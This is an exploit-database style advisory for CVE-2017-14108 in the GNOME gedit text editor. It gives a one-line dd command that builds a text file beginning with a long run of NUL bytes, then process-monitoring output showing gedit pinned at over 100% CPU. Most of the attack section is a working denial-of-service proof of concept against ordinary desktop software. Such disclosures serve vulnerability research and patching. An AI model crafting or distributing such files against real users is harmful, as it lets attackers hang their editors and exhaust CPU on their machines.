################ #Title: libgedit.a mishandling NUL Blocks in gedit(GNOME text editor) #CWE: CWE-400 #CVE: CVE-2017-14108 #Exploit Author: Hosein Askari #Vendor HomePage: https://gnome.org , https://wiki.gnome.org/Apps/Gedit #Version : All Version (3.22.1 and older version) #Tested on: Ubuntu 16.04 (Linux 4.4.0-93-generic) #Date: 01-09-2017 #Category: Application #Author Mail : hosein.askari@aol.com #Description: libgedit.a in GNOME gedit through 3.22.1 allows remote attackers to cause a denial of service (CPU consumption) via a file that begins with many '\0' characters. ############### sudo echo -ne '\x68\x6f\x73\x65\x69\x6e\x20\x61\x73\x6b\x61\x72\x69' | dd conv=notrunc bs=1000 seek=100 of=craft.txt ################ POC: constantine@constantine:~$ pidstat -h -r -u -v -p 3107 Linux 4.4.0-93-generic (constantine) ۱۷/۰۹/۰۱ _i686_ (2 CPU) # Time UID PID %usr %system %guest %wait %CPU CPU minflt/s majflt/s VSZ RSS %MEM threads fd-nr Command 1504280041 1000 3107 16.43 0.01 0.00 0.03 106.44 1 15.53 0.00 121296 38804 0.95 4 18 gedit constantine@constantine:~$ top PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 3107 constan+ 20 0 128884 38492 28320 R 106.7 0.9 0:17.76 gedit ################